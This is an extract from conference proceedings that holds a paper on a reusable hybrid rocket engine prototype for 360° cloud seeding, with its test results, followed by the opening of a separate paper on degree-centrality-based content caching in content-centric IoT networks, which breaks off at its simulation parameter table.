S. Shukla (B) · G. Singh · P. L. Mehta


IILM Academy of Higher Learning—College of Engineering and Technology, Greater Noida,
India
G. Singh
e-mail: gautam.singh.cs22@iilmcet.ac.in
P. L. Mehta
e-mail: purnima.mehta@iilm.edu

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 481
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_39
482 S. Shukla et al.

at many times, it has proven to be a better option than less or no rain at all. Imple-
menting various innovations and inventions, several methods and technologies such
as planes, drones, ground generators, electricity, lasers, rockets are being used at
the place where rainwater is insufficient. Out of many rain enhancement techniques,
cloud seeding is one such method and can be defined as the process that helps in
accelerating rain making process in providing an additional nucleus around which
water droplets can accumulate and condensate. Cloud seeding helps in hail suppres-
sion which decreases the overall size of the hails which thus minimizes the damage
when they hit the ground, providing prevention of crop damages, temperature control,
pollution control, drought control, etc. [1, 2]. It helps in booming agricultural sectors,
covering every benefit mentioned earlier like prevention against crop damage, a
controlling temperature which helps in speeding up the germination process of the
plants, providing water as rain. The more water available the more trees/plants which
increase the cycle of exchange of gases becomes stable and results in good yield.
Other applications like preventing flooding/ponding damage in the crop as they
require oxygen for respiration [3]. Cloud seeding applications in agriculture sectors
are endless yet to be implemented completely.
Apart from traditional methods and applications of cloud seeding, it is still been in
research until today. One of the latest feasibility tests of cloud seeding was conducted
in the Yadkin river basin, North Carolina (US) [4] to increase hydropower energy from
project dams using air and ground-borne seeding in different climatic conditions to
increase hydropower (clean energy). Similarly, UAE recently applied cloud seeding
projects and has gone for the three-month-long process of cloud seeding in 2020
that is a total of 95 cloud seeding missions by the National Center of Meteorology
(NCM) as based on the previous missions’ results [5]. Not far behind, China also used
and is still using cloud seeding methods to combat water shortages that may result in
adding 60 billion cubic meters of additional rainfall [6]. As China suffered from water
shortage, they came up with a solution for the problem as cloud seeding. Their new
technology of charged particle (negative ion)-based cloud seeding technique does
not use conventional chemicals in cloud seeding but use ion-based cloud seeding
that is cleaned and more beneficial, environment friendly, and economical to operate
on a large scale. Yet it is research and to be carried out in the field [7].
Recent studies in cloud seeding have been done to check the process and
enhancement in different climate regions. Various countries like UAE, Thailand,
and Serbia are using more efficient enhancement agents like core/shell sodium chlo-
ride (NaCl)/Titanium dioxide (TiO2) nanostructure (CNST) over previous agents like
NaCl seeding. The result shows that CNST is a more efficient and powerful precipi-
tation enhancer depending on humidity level and areas [8]. In addition to this, most
recent research done by the University of Colorado at Boulder using Quantifying
snowfall [9] from orographic cloud seeding for increasing snowpack in mountains
is being tested which uses radar dish to quantify snowfall and experiments using
high-voltage generated corona discharge in the formation of rain and snow [10]. The
solution provided by cloud seeding seems to grab the attention of the world yet coun-
tries like India where cloud seeding projects are not implemented in full potential due
to its history in cloud seeding projects. Recent activities have come into consideration
Engine Prototype and Testing Measurements of Autonomous … 483

like Karnataka’s climate modification projects [11] which are of previous projects
and seem it will end soon. Weather modification has not been developed and well
implemented in India due to a lack of implementation, interest, and involvement of
government or private weather agencies in weather-related projects. Yet is a variable
option for future needs. All solutions seem to have some potential to provide a solu-
tion toward water problems for now, and in the future, yet it is to be considered that
playing with Mother Nature is not the best option. We need a controlled pattern and
plan to practice these techniques but under control.

2 The Novel 360°Cloud Seeding Approach

Apart from many cloud seeding approaches, countries and companies or agencies are
using rockets using an innovative network of artificial intelligence-enabled strategic
micro-rocket launches and a distributed grid of climactic sensors and spreading tech-
nologies for cloud seeding. Like ACAP’s Striyproekts, the “LOZA” missile protec-
tion system is designed for active impact on clouds by spraying chemical reagents
and for other considerations [12] The Nashik rocket project in India launching 1000
rockets to induce artificial rains was used for cloud seeding using a similar tech-
nique [13]. The rockets are launched from the ground with a missile rocket launcher
vehicle to target clouds nearer to the ground. This makes it good to target nearer
clouds reducing the probability of area coverage when things are not in favor of the
technique. These missiles cover a trajectory path from the ground to the cloud for
seeding and finally fall to the ground. The system of other rocket methods is practical
for small projects which makes it the least appropriable option but has great potential.
Upgrading to the trajectory concept, the Novel 360° cloud seeding approach is a new
highly efficient pattern forming cloud seeding approach for maximum coverage per
seeding [14]. This reduces costs and increases the probability of rain formation and
efficiencyi . The rocket heads toward the center of the targeted cloud and hovers for
a while to calculate the necessary details. After having the complete assurance of
it surrounding and stability, it opens the umbrella mechanism (Fig. 2) and spreads
seeding agents by shooting four smaller rockets in all four directions (Fig. 3). After
which the rocket heads back to the ground for self-landing to be ready for targeting
other clouds. Meanwhile, if the previous cloud needs more seeding the rocket follows
the above-mentioned approach but changing its orientation different than the previous
four directions, this makes a circular seeding process to seed the clouds in one go
rather than conventional methods of stripes in a row (Fig. 1) [14].
Figure 1 shows the conventional methods done by planes, drones, etc. using
multiple stripes pattern technique in a single cloud for spreading seeding agents
into clouds. As per conventional or present-day technologies, this type of seeding is
considered the best option so far as it ensures more probability of rainfall than other
used methods.
484 S. Shukla et al.

Fig. 1 Conventional methods [15]

Fig. 2 Umbrella mechanism completely open [12]

Even though this is the best option so far, alternative methods are being developed
yet the procedure of plane-based cloud seeding reduces efficiency and increases the
time and cost rapidly.
Figure 2 shows the umbrella mechanism in action which acts as a launching
platform for smaller rockets for stable and directional liftoffs. During the hovering
period, the arms open at 90°each, and the thrust platform provides an action-reaction
platform to gain maximum speed for the smaller rockets to shoot into the clouds in a
Engine Prototype and Testing Measurements of Autonomous … 485

Fig. 3 360° pattern or


orientation [12]

controlled direction. Four smaller rockets carrying seeding agents as fuel gets liftoff
into the clouds to complete the task of 360° cloud seeding.
Figure 3 shows the 360° pattern or orientation that spreads the seeding agents in all
four directions. As mentioned in Fig 2, the smaller rockets are launched into specific
directions for variable seeding. The direction in the above picture can be changed
to any four directions within 360°using thrust vectoring and reaction control system
(RCS) [12] for active real-time control to increase the effectiveness of seeding and
increasing the probability of rain.

2.1 Reinforcement Learning-Based Cloud Seeding


Mechanism

The rocket base cloud seeding method (report paper) uses machine learning to make
the whole concept feasible in the real environment it uses:
• Reinforcement learning (RL) [16]: Reinforcement learning (Fig. 4) is part of
machine learning (ML) where the core idea is to try copying human real-time intel-
ligence of action and reaction (reflex) based on experience and real-time response
over any problem-solving activity involving environment (surroundings), inter-
preter (humans), agent (rocket), and action (reactions). This concept is used in our

Fig. 4 Reinforcement
learning
486 S. Shukla et al.

RCS, self-landing mechanism [12], mission abort controls, trajectory behavior,


umbrella mechanism, real-time orientation adjustments, and all factors required.
• Tracking cloud behaviors [17]: Clouds behavior, precipitation level, and other
monitoring are monitored using machine learning
• Monitoring Rocket Health: Using ML to check the overall health of the rocket
especially the engines making it more efficient to produce the next generation
engine management systems.
• Guidance Navigation and Control (GN&C): Controlling land vehicles with
our precise awareness about their path and trajectory can be achieved, whereas
rockets are extremely fast. A small degree of deviation in trajectory can end up the
rocket going on a different path. This is a place where computational power steps
in calculating altitude, the center of mass rotation, and trajectory with extreme
precision in a fraction of time.
• Radar technology: Using radar altimeter to define the positioning and deter-
mining the time for radio beams to hit the ground and return to the rocket to
adjust the descent speed while landing the rocket (Figs. 5 and 6).
The system works firstly by navigating the working of the rocket, i.e., orientation
via angle of reference of the trajectory and range. Pitch, roll, and yaw configuration
based on each axis “Euler Angle.” The state vector of the rocket is controlled by
using sensors like 3D orientation, position altitude, gyroscopes, accelerometers, laser
meter, radio finder, and video camera. This all is done by the on-board computer.
The second part is the guidance which is altogether the most efficient and opti-
mized use of machine learning algorithms (nonlinear and non-convex equations) that

Fig. 5 Radar altimeter use in descent control in rocket [18]


Engine Prototype and Testing Measurements of Autonomous … 487

Fig. 6 Euler’s angle [19]

define the working of the rocket. It is the more over the software side that is used by
the navigation to communicate and decide the best course of action. The changes in
the direction are done via mechanical inputs via TVC and RCS giving small devi-
ations creating torque and steering the rocket to the right state vector controlled by
the algorithms. It is also responsible for mission abort if everything goes wrong.
The process starts with the liftoff of the rocket from the ground fully equipped
with all the necessary and predictable maneuvers planned. The on-board computer
starts taking all data and decisions. At a point in the middle of the flight trajectory,
cloud tracking systems start giving detailed data and suggestions about humidity level
and its positioning in 3D space to the ground control center to give a final decision
over the course of action. At the time when the targeted cloud has been entered,
the rocket gives a final signal before starting the seeding process and checking the
orientation of the rocket for a mechanism to get active by pressuring the hydraulics
pistons. Meanwhile, the on-board continuously stabilizes the rocket hovering using
TVC and RCS against the variables. Reinforcement learning controls every factor
possible from liftoff to landing. The rocket hovers for a while within this the umbrella
mechanism [12] opens its arms and ignites the seeder rockets using both TVC and
RCS to counterbalance the seeders thrust in all four directions. The rocket then
descent using radar to determine the descent speed and use the umbrella mechanism
arms as active air brakes to slow down the rocket and finally TVC and RCS slowly
land the rocket on the ground. The seeder rockets either get destroyed during the
seeding process or land on the ground using parachutes giving their active location
to the control stations to collect them. These all steps, maneuvers, and data sharing
works so fast that the total process takes take a few minutes to complete.
488 S. Shukla et al.

3 Phase 1 Research Testing Report: The Proposed Concept

Materials Used: Polymethyl meta acrylate (PMMA) fuel grain, O2 tank for oxidizer,
switch valves, pipes, 8 × 8 × 8 inches aluminum Block for the nozzle and two 8 × 2
× 8 inches aluminum slab for the support engine cover, aluminum rings (12 inches),
pressure gauze, 0.5 − inch screws, rubber inner walls, and miscellaneous.
Figure 7 explains the fuel and oxidizer flow. The oxidizer gets released into the
fuel through an inlet 150psi ~ 10.6 N initiating a chemical reaction inside the combus-
tion chamber due to temperature raided by ignition, it starts burning due to excess
oxygen (O2 ). The combustions chamber increases the pressure due to the expansion
of particles and gases, and a huge amount of thrust is escaped from the rocket nozzle
propelling the rocket forward.
Figure 8 shows the engine layout including an inlet for oxidizer, a post-combustion
chamber for the increasing flow of the oxidizer, the fuel grain (PMMA), a post-
combustion chamber for the increasing region of combustion before exiting through
the nozzle. All parts combined show the engine part of the hybrid rocket system
[15]. This system is optimal as per real-time control over accidents ensuring safety,
efficiency, and reduction of internal and external damages of the rocket.
Figures 9 and 10 shows the engine prototypes side and top view with an inlet for
oxidizer, regulators, skeleton frame, fuel grain (PMMA), and nozzle.
Figure 11a describes the theoretical nozzle design made up of aluminum and used
CNC for accurate construction of the nozzle. It includes three parts, the combustion
chamber where the expansion of fuel takes place by mixing the oxidizer and the fuel

Fig. 7 Oxidizer and engine workings/flow [12]

Fig. 8 Engine structural layout


Engine Prototype and Testing Measurements of Autonomous … 489

Fig. 9 Rocket engine prototype phase 1 (side view)

Fig. 10 Rocket engine


prototype phase 1(front
view)

and igniting it, the throat part compresses the expanded gases to an extreme velocity
that eventually gets released through the end of the nozzle making the rocket to move
forward against the gravity.
Figure 11b is the actual nozzle design that includes contraction for making the
expanded gases gain extreme exit speed which further moves toward the throat for
the highest compression possible by decreasing the area of flow, and increasing exit
pressure, force, and expansion that gives maximum thrust and efficiency.
Figures 12 and 13 show the physical model of the nozzle applying design layout
in CNC. The nozzle has a mass of 1.5 kg as it is designed considering upcoming
phases. During the upcoming phases, the designs will be the most accurate design
using 3D design tools, simulation, and rendering.
490 S. Shukla et al.

Fig. 11 a Nozzle designs. b Nozzle designs

Fig. 12 Actual nozzle


design (side)

4 Testing Results

In this section, we will present the testing results of the rocket-based cloud seeding
mechanism. As rocket testing was conducted in different phases, we will elaborate
in detail on each phase in this section.
Engine Prototype and Testing Measurements of Autonomous … 491

Fig. 13 Actual nozzle


design (back)

• Ignition phase: Fig. 14 showcases the burning of fuel with oxidizer and getting
ignited to reach the desired temperature for maximum thrust, burning out irreg-
ularities in design and fuel along with it. It shows contraction compression and
expansion taking place initially is one of the most crucial parts in thrust expansion
ensuring constant thrust, then robustness of the design and its practicality. This
phase is one the most important phase as this ensures the safety, adaptability, and
strength of the design to handle the force exerted by the internal expansion of
fuel and oxidizer. If this phase fails, then the design is considered fatal and re-
designing must be applied immediately. Our prototype was built for these kinds
of internal pressure which resulted in a successful ignition phase ensuring that the
prototype is safe and suitable for more pressure to move to the next phase.
• Leveling up thrust phase (rise in maximum temperature): As the ignition
phase was safely executed, the prototype was moving to the next phase to with-
stand an even greater amount of pressure as shown in Fig. 15, leveling up was
performed to reach the maximum temperature and pressure for full thrust. This
phase examines the design workings in terms of calculation (pressure/force),
ability to withstand the rise in temperature, structural integrity, application of
design, and its compositions. This phase checks the engine efficiency and tests

Fig. 14 Ignition/initiation sparks


492 S. Shukla et al.

Fig. 15 Fuel in its maximum ignition temperature level for lamina flow

the engine to its maximum potential. At a certain pressure, the thrust becomes
constant for a certain time; thus, it reaches its maximum potential and decreases
as inlet pressure decreases becomes constant. At 150psi ~ 10.6 N, the thrust of the
prototype became constant and started decreasing a bit as our inlet of the oxidizer
to the engine was limited and the exit pressure was increasing immensely.
• Maximum thrust and pressure phase: Maximum pressure and temperature arc
along with over expanded thrust results in the maximum thrust provided by the
engine. Figure 16 shows ideal situation pa ∼ = pe, the maximum thrust of 49.03 N
= 5 kg and pressure, the first curve of diamond thrust. This phase is in connection
to the leveling up temperature phase as this phase just stayed for around 7–8 s
before the structural strength of the engine got weakened as the temperature arc
reached near the inlet area. This shows that our designs had some flaws (pre-
combustion protection cover got damaged due to temperature rise) in the area

Fig. 16 Ideal situation pa ∼


= pe maximum thrust 49.03 N and pressure, the first curve of diamond
thrust
Engine Prototype and Testing Measurements of Autonomous … 493

near inlet pressure. The flaws are considered as unavailability of good insulators
for the protection that is the result of various external and miscellaneous factors.
After this result, the prototype was forced to shut down by cutting up the oxidizer
flow into the engine. Even though the result was not perfect but it showed the
advantage of having a hybrid engine that enables to have full control to abort the
testing if something is out of control.
Final phase: After 7 seconds of burn time, the pressure raised to temperature
started melting the body (aluminum) along with the seal near the oxidizer inlet as
shown in Fig.17. Even though the body got damaged during the temperature arc, the
nozzle had no damage or melt. The test was complete with the results that many things
had to be reconsidered like inlet pressure nozzle, material selection, weight reduction
sealing, and the design. Few things did not go according to the plan which is fine as
things are unpredictable in rocket science. After a few debugging in design, the same
engine will be practical for larger scaling for the prototype. The test was a success,
giving us the necessary details and data over various factors and to rethink the design
factor and safety. This also proved that the reusability of the rocket engine is possible
as, during the test, external factors were the only things that were unpredictable which
shows that after multiple iterations, the final result will help to reduce the overall cost
of transporting the umbrella mechanism and seeders to its final position in the clouds
and will be able to re-use the engine for the next launch. Small steps and iteration
till the final rocket engine will provide the most efficient transporter of the seeders.
The next testing will have the new improved reusable engine with way more thrust.
Figure 18 shows the ideal case of raise in altitude concerning the time of this
prototype if the thrust to weight ratio is TWR > 1 and efficiency is more. The rocket
looks like it rising exponentially. Apart from the ideal situation, the current stage was
not able to show such theoretical results. This means that the design of the prototype
was not up to the mark including factors like overweight and less thrust or TWR

Fig. 17 Vacuum inside the


pre-combustion chamber and
post-combustion chamber
494 S. Shukla et al.

Fig. 18 Altitude ft. versus


time s graph of the rocket

< 1, as shown in the graph it is taking a lot of time to overcome its inertial mass
and gain upward momentum against the gravity (Fig. 19). The more time it takes
to gain momentum and cover maximum altitude the less fuel it has to continue the
trajectory. A selection of materials and engine efficiency increases the altitude will
be proportional to time.
Figure 19 Shows the graph between thrust and acceleration. The prototype was
able to give 49.03 N of thrust which was not sufficient to overcome the TWR; thus,
the acceleration was negative 7.8 m/s2 49.03 N, similarly, the negative acceleration
was overcome to positive at around 250 N of thrust, and to make the rocket move it
was needed to overcome the g 9.8 m/s2 for liftoff
Figure 20 shows the graph between propulsion efficiency and equivalent velocity.
The propulsion efficiency shows irregularity inefficiency because oxidizer pressure
through inlet150psi ~ 10.6 N was a constant and lesser as compared to what was

Fig. 19 Thrust (N) versus


acceleration m/s2 graph of
the rocket here negative
acceleration means the
rocket is overcoming its
mass against the gravity
Engine Prototype and Testing Measurements of Autonomous … 495

Fig. 20 Propulsion
efficiency (np ) versus
equivalent velocity m/s graph
of the rocket

needed. Efficiency increases as the pe = exhaust pressure at nozzle exit pa = inlet


pressure become equal giving maximum thrust concerning the fuel.

5 Result Discussion

This overall experiment of the rocket phase 1 prototype gave the results close to the
calculations that were made in our previous work. The final phase was at its extreme
level and was in danger of explosion and burst-out of flames. The results we were
able to get had a payload capacity of 3.94 kg without any external forces like drag,
density, and gravitational pull as the test was done horizontally which shows that
payload would have decreased even more. Apart from this, the availability of raw
materials for the design of the rocket was a huge problem that unexpectedly added
an unnecessary weight of 10 kg to the overall mass of the rocket. Challenges may
occur unexpectedly some are easy to tackle while others are variable and can occur
at any instance. Mechanical challenges: The working, wear and tear of valves, and
other mechanical/hardware parts. Engine failure and leaks over sealing and dealing
with the pressure of the combustion in the engine chamber. Variable challenges:
This includes other challenges that mostly affect the development or initial stage
such as availability of raw materials, design, the computational power of computers,
sensors, budget problems/challenges, developing new techniques for optimization.
All static test problems occurred during the initial stage of the rocket development
which includes all the above challenges.
496 S. Shukla et al.

6 Conclusion

The Novel Umbrella 360 Cloud Seeding Based on Self-Landing Reusable Hybrid
Rocket will be one of the best available solution regarding efficiency, reusability,
cost, and versatility toward the cloud seeding methods as in this report, the testing
phase is being explained with its applications, challenges faced as structural design,
assembly, management of temperature during the testing, thrust, calculations, and the
results. The current phase can be classified as 60% according to as planned and proof
of its scalability. This prototype shows the potential for rocket-based cloud seeding
to be a successful decision so far. Perhaps during its scalability, this approach might
be the best solution for rain making methods that will be decided as things will
get according to plan to make the final and the most efficient rocket-based weather
modification system.

7 Future Scope

Future studies and applications regarding rocket-based cloud seeding must be


conducted especially in the area relating to rockets and cloud seeding as present-day
studies and applications are limited to its technology is not ensuring the goal or the
idea for providing rainfall and ultimately providing water availability. The expansion
of rockets as seeding agent carriers ensures the most efficient, quick, multitasking,
and multi-use application. Upcoming advancement in the effectiveness of rocket-
based methods can be even more accurate under different circumstances which itself
recommends future studies to do over it. Furthermore, the concept of 360 umbrella
seeding method, self-landing (Thrust Vectoring) method, reaction control system
(RCS) is using machine learning algorithms which will be explored, applied, and
tested in this sector which is an integral part of upcoming phases of the project. If
things are according to the plan the hypothesis, we will end up having a remarkable
solution regarding the weather modification system.

References

1. Cloud Seeding—An overview | ScienceDirect Topics. https://www.sciencedirect.com/topics/


earth-and-planetary-sciences/cloud-seeding. Last Accessed 01 Jan 2021.
2. Rosenfeld, D. (2007). New insights to cloud seeding for enhancing precipitation and for hail
suppression. JournalWeaMod, 39, 61–69.
3. Tech_Bulletin-5.pdf. http://www.niam.res.in/sites/default/files/pdfs/Tech_Bulletin-5.pdf.
4. Griffith, D., Yorty, D., & Simmons, W. N. (2019) Feasibility/design study for a cloud seeding
program in the Yadkin River Basin, North Carolina. JournalWeaMod, 51.
5. Godinho, V. (2020). UAE undertook 95 cloud seeding operations in Q1 2020, https://gulfbusin
ess.com/uae-undertook-95-cloud-seeding-operations-in-q1-2020. Last Accessed 15 Jan 2021.
Engine Prototype and Testing Measurements of Autonomous … 497

6. China sets 2020 “artificial weather” target to combat water shortages, East Asia News & Top
Stories—The Straits Times. https://www.straitstimes.com/asia/east-asia/china-sets-2020-artifi
cial-weather-target-to-combat-water-shortages. Last Accessed 15 Jan 2021.
7. Zheng, W., Xue, F., Zhang, M., Wu, Q., Yang, Z., Ma, S., Liang, H., Wang, C., Wang, Y., Ai,
X., Yang, Y., & Yu, K. (2020). Charged particle (negative ion)-based cloud seeding and rain
enhancement trial design and implementation. Water, 12, 1644. https://doi.org/10.3390/w12
061644.
8. Ćurić, M., Lompar, M., Romanic, D., Zou, L., & Liang, H. (2019). Three-dimensional
modelling of precipitation enhancement by cloud seeding in three different climate zones.
Atmosphere, 10, 294. https://doi.org/10.3390/atmos10060294.
9. Quantifying snowfall from orographic cloud seeding | PNAS. https://www.pnas.org/content/
117/10/5190. Last Accessed 15 Jan 2021.
10. Yang, Y., Tan, X., Liu, D., Lu, X., Zhao, C., Lu, J., & Pan, Y. (2018). Corona discharge-induced
rain and snow formation in air. IEEE Transactions on Plasma Science, 46, 1786–1792. https://
doi.org/10.1109/TPS.2018.2820200.
11. Kumar, R. (2018). Scope of cloud seeding in India. IJRASET, 6, 4641–4645. https://doi.org/
10.22214/ijraset.2018.4762.
12. Stroyproject—about us. Manufacturer of LOZA ROCKETS. https://www.cloud-seeding.info/
page.php?id=2&lang=1. Last Accessed 16 Feb 2021.
13. Nashik: Rocket finally fired in dry zone, cloud seeding to bring in rain | Nashik News—Times
of India. https://timesofindia.indiatimes.com/city/nashik/nashik-rocket-finally-fired-in-dry-
zone-cloud-seeding-to-bring-in-rain/articleshow/48510296.cms?utm_source=contentofint
erest&utm_medium=text&utm_campaign=cppst. Last Accessed 16 Feb 2021.
14. Shukla, S., Singh, G., Sarkar, S. K., & Mehta, P. L. (2021). Novel umbrella 360 cloud
seeding based on self-landing reusable hybrid rocket. In International Conference on Inno-
vative Computing and Communications (pp. 999–1011). https://doi.org/10.1007/978-981-15-
5148-2_86..
15. Siliceo, E. P., A, A.A., Mosiño, P. A. (1963). Twelve years of cloud seeding in the Necaxa
Watershed, Mexico. Journal of Applied Meteorology and Climatology, 2, 311–323. https://doi.
org/10.1175/1520-0450(1963)002<0311:TYOCSI>2.0.CO;2.
16. Mnih, V., Kavukcuoglu, K., Silver, D., Rusu, A. A., Veness, J., Bellemare, M. G., Graves, A.,
Riedmiller, M., Fidjeland, A. K., Ostrovski, G., Petersen, S., Beattie, C., Sadik, A., Antonoglou,
I., King, H., Kumaran, D., Wierstra, D., Legg, S., & Hassabis, D. (2015). Human-level control
through deep reinforcement learning. Nature, 518, 529–533. https://doi.org/10.1038/nature
14236.
17. Xian, M., Liu, X., Yin, M., Song, K., Zhao, S., & Gao, T. (2020). Rainfall monitoring based
on machine learning by earth-space link in the ku band. IEEE Journal of Selected Topics in
Applied Earth Observations and Remote Sensing., 13, 3656–3668. https://doi.org/10.1109/JST
ARS.2020.3004375.
18. Molmud, P. (1963). Vernier exhaust perturbations on radar and altimeter systems during a lunar
landing. AIAA Journal, 1(12), 2816–2819. https://doi.org/10.2514/3.2177. https://arc.aiaa.org/
doi/abs/10.2514/3.2177?journalCode=aiaaj.
19. Li, Y., Lu, H., Tian, S., Jiao, Z., & Chen, J. T. (2011). Posture control of electromechanical-
actuator-based thrust vector system for aircraft engine. IEEE Transactions on Industrial Elec-
tronics, 59(9), 3561–3571. https://doi.org/10.1109/TIE.2011.2159351. https://ieeexplore.ieee.
org/abstract/document/5873146.
An Efficient Caching Approach
for Content-Centric-Based Internet
of Things Networks

Sumit Kumar, Rajeev Tiwari, and Gaurav Goel

Abstract The Internet of Things (IoT) become established as a promising environ-


ment, which connects a vast number of physical devices. The rapid increase in the
number of IoT devices has imposed many challenges in the Internet Protocol (IP)-
based Internet architecture. Towards this, the content-centric networking (CCN) has
been realized as the potential Internet architecture in which the contents are accessed
using a name-based mechanism. The underlying advantages of CCN that includes
in-network caching capabilities and faster data delivery make it the most suitable
architecture for latency-sensitive IoT applications. In this paper, the proposed novel
content caching scheme efficiently utilizes the available caching resources. The
scheme considers the node degree-centrality, hop-based distance and the content
access frequency for making content caching decisions. The scheme places the
frequently accessed contents on the high degree-centrality routers close to the bound-
aries of network and improves content availability. Comprehensive simulations on
the Abilene network topology with different cache capacities demonstrate the perfor-
mance improvement of proposed scheme over peer caching schemes. The simulation
results are obtained for various performance metrics such as cache hit ratio, average
network hop-count and latency parameters. The obtained quality-of-service (QoS)
shows that the proposed scheme is suitable for latency-sensitive CCN-based IoT
networks.

Keywords CCN · IoT · Caching · Network performance

S. Kumar (B)
Department of Systemics, School of Computer Science, Energy Acres, University of Petroleum
and Energy Studies, Bidholi, Dehradun 248007, India
R. Tiwari
Department of Virtualization, School of Computer Science, Energy Acres, University of
Petroleum and Energy Studies, Bidholi, Dehradun 248007, India
e-mail: rajeev.tiwari@ddn.upes.ac.in
G. Goel
School of Computer Science, CEC, Landran, University of Petroleum and Energy Studies, Energy
Acres, Bidholi, Dehradun 248007, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 499
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_40
500 S. Kumar et al.

1 Introduction

IoT emerges as the collection of devices, which are connected using the Internet [1,
2].The IoT devices and their applications focus on accessing the required content
with minimal latency instead of focussing on the location of the content source [3].
In this direction, the host-centric properties of current IP-based Internet environment
[4, 5] have a fundamental deviation from the data-centric requirements of the IoT
applications. The tremendous increase in the count of connected IoT nodes and their
data needs has also raised various challenges for the IP-based networks related to
the efficient handling of the content [6].
To mitigate the restrictions from the existing Internet design, a novel CCN archi-
tecture is proposed in recent [7] where each content has a unique name, and the
devices access the contents using their names. The in-network caching capabilities
[8] makes CCN the most suitable architecture for latency-sensitive IoT applications.
For content-centric information retrieval in the IoT networks, CCN implements
three data structures called, forwarding-information-base (FIB), pending-interest-
table (PIT) and the content-store (CS) [9, 10]. To access a content, the IoT device
generates the Interest message and forward it towards the content provider/server
using single-hop/multi-hop communication. After analysing the Interest message, a
content provider creates the content message with required payload and forward it
in the reverse direction towards the requester.
During content message forwarding, the intermediate routers also perform content
caching operations to reduce server load, bandwidth requirements that also increases
QoS for the requesters [11]. Generally, the intermediate routers have extremely small
cache storage as compared to content catalogue size in the network. Hence, efficient
content placement/replacement operations play an important role in the performance
of the CCN. The content caching decisions include content placement (Choosing
appropriate router to cache the content) and content replacement (evicting older
content from the CS of the router, if it becomes full) operations [12, 13]. In order
to effectively utilize the available network resources, an efficient caching scheme is
necessary and required that would increase the QoS for the IoT devices.
In this direction, it is argued that placing the frequently accessed contents for a
longer duration, on those routers that have a higher degree-centrality and are near
to edges of the network, would improve the network performance. Therefore, the
proposed scheme jointly considers the router’s degree, its distance traversed by the
Interest message from content provider and content popularity for caching decisions
during content forwarding.

2 Literature Review

Presently, the connected world of IoT devices turned out to be a reality that includes
several application domains such as smart wearables, smart cities, health care and
An Efficient Caching Approach … 501

energy management systems [14]. To improve the data dissemination in the IoT
environment, CCN implements in-network caching to minimize the network delay
and bandwidth requirements. The effectiveness of the content caching mechanism
ensures improvement in the QoS offered to the IoT devices (requesters) as the cache
sizes of the network routers are very low to store huge data transmissions. There-
fore, various caching strategies have been suggested by the researchers that place
the contents in the network routers to reduce the server load and deliver requested
contents with reduced latency.
The leave-copy-everywhere (LCE) [7] caching scheme is the traditional strategy
for the CCN that copies the content in every intermediate router. The random
probability-based placement scheme (Prob) [15] considers the random probability to
cache the contents. The scheme provides a simple mechanism for the caching oper-
ations, which is independent of the network and content characteristics. The Prob-
cache [16] scheme determines the route caching capability during the data placement
decisions and equitably multiplex the contents of diverged routes.
A centrality metric centred caching strategy is recommended in [17], which selec-
tively places the content replicas in the network by considering the betweeness
centrality of the on-path routers. The CPNDD scheme [18] jointly considers the
node degree centrality and hop-count characteristics to determine suitable router
for content placement operations. The caching strategy discussed in [19] uses the
combination of several centrality metrics and popularity of contents for caching
decisions.
The MAX-gain in-network caching (MAGIC) [20] scheme performs content
caching operations using the content access pattern and the distance parameters. The
fine-grained popularity-based caching (FGPC) scheme [21] determines the content
access frequency using a distinguished data structure and uses a static value to deter-
mine the frequently accessed contents. The DPWCS [22] implements a novel data
structure in all network routers to filter popular contents and perform caching oper-
ations in those intermediate routers that experience higher access frequency for that
content.

3 Proposed Caching Scheme

The proposed mechanism explores the caching performance by jointly considering


degree centrality and hop-count for the caching decisions. The degree centrality of
the routers has been determined as the number of edges connected with the router.
Increasing the caching probability for the higher degree-centrality routers would
increase the content availability in the network as higher degree-centrality routers
receive more number of Interest messages. The caching probability also grows as
the content message traverses in the delivery path to store the contents towards the
requesters in the network. To simplify further discussion, the following notations are
used in the paper:
502 S. Kumar et al.

• R: Collection of the network routers and Ri signifies ith router.


• CS(Ri ): Content store size of ith router.
• I j /C j : jth Interest/Content message with content name C_Name(I j ).
• Hop(I j )/Hop(C j ): Number of hops traversed by I j /C j .
• DC(Ri ): Degree centrality of router Ri .
• Max(DC(I j )): Maximum degree centrality encountered by I j in the path.
• λ: Content request rate in the network.
• |N|: Content catalogue size (Entire set of distinguished contents).
Processing of Interest Message: To access a content (C j ), the requester IoT device
creates the Interest message (I j ) that have two additional fields Max(DC(I j )) and
Hop(I j ) that are initialized to 0. The device transmits Interest message (I j ) to the
nearest router Ri . On receiving the Interest message, each on-path router (Ri ) performs
the following operations:
1. Hop(I j ) = Hop(I j ) + 1
2. If DC(Ri ) > Max(DC(I j )) then, Max(DC(I j )) = DC(Ri )
3. Then, Ri checks its storage for the required content. If the cache holds the corre-
sponding content C j , then the router perform processing of content message
procedure (discussed subsequently).
4. Otherwise, repeat steps 5 to 7 until the cache hit occurred in the CS(Ri ) or I j
reaches the content server which have the entire content catalogue.
5. Ri lookup its PIT for previously forwarded request with I j . If the entry exists,
then router Ri aggregates I j in its PIT and discards the request.
6. If no record exists in the PIT for I j then, Ri searches its FIB to forward the I j
to the suitable upstream router/server in the network and create an entry in the
PIT.
7. If no suitable information exists in FIB, then Ri would remove I j from the
network.
Processing of Content Message: When the content hit occurred in the CS(Rm ) or
I j reaches the content server (server), then the Rm /server prepares the corresponding
content message (C j ). The Rm /server then replicate the Hop(I j ) and Max(DC(I j ))
information from the I j to the Hop(I j ) and Max(DC(I j )) fields of the C j . The content
provider initialize the value of Hop(C j ) to 0 and forward the C j in the reverse direction
towards the requester. On receiving the message (C j ), each intermediate on-path
router (Ri ) performs following operations:
1. Hop(C j ) = Hop(C j ) + 1
2. If no pending Interest message exists in the PIT, then remove C j from the network
without caching operations.
3. If PIT entry exists for the C j , then the router Ri forwards C j towards the
requesters as per its PIT.
C
4. For content placement operations, Ri computes the value of Gain Rij parameter
using Eq. 1 as follows:
An Efficient Caching Approach … 503

Table 1 Simulation
Parameter Value
parameters
CS(Ri ) 50
ψ 0.1–1.0
λ 50/s
Payload size 1 KB
Content catalogue size (|N|) 5000
Exponent value in Zipf 0.8
distribution (α)
Network topology Abilene [23]
